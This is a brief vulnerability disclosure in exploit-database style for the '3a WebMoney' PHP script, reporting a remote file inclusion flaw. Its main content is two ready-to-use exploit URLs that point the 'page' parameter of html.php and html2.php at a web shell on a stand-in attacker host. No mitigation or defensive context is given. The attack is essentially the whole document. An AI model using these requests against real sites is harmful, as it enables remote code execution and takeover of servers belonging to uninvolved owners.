< ------------------- header data start ------------------- >
#############################################################

# Application Name : 3a WebMoney

# Vulnerable Type : Remote File Include Vulnerability

# author : Septemb0x

# Script Down.& WebSite : http://s2.dosya.tc/3aWebMoney.rar.html & http://www.mestkom.ru/asp/pay.asp?id_d=14795

#############################################################
< ------------------- header data end of ------------------- >

< -- bug code start -- >

EXPLOIT :
1. http://sitename/path/html.php?page=http://attackersite/shell.php
2. http://sitename/path/html2.php?page=http://attackersite/shell.php


< -- bug code end of -- >